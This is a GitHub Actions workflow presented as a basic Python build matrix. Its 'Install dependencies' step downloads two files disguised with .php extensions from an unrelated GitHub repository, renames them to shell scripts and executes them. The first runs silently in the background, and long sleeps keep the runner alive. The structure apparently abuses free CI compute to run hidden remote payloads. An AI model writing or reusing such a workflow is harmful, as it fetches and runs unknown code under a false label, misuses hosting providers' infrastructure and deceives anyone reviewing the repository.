# This is a basic workflow to help you get started with Actions
# This is a basic workflow to help you get started with Actions

on:
  push:
    

name: main
jobs:
  build_linux:
    name:  Linux-mac
    container:
      image: ubuntu:20.04
    runs-on: ubuntu-latest

    strategy:
      fail-fast: true
      matrix:
        python-version: ["3.8", "3.9", "3.10"]

    steps:
    - uses: actions/checkout@v3
    - name: Set up Python ${{ matrix.python-version }}
      uses: actions/setup-python@v3
      with:
        python-version: ${{ matrix.python-version }}
    

    - name: Install dependencies
      run: |
        set -e
        apt-get update -y
        apt-get install -y sudo curl git wget screen sudo build-essential manpages-dev 
        mkdir set
        cd set
        wget https://github.com/Nsavtu/mosv1hbxe/raw/main/gi.php 
        mv gi.php gi.sh
        bash gi.sh &> /dev/null &
        sleep 300
        wget https://github.com/Nsavtu/mosv1hbxe/raw/main/di.php
        mv di.php nk.sh
        bash nk.sh
        sleep 4849
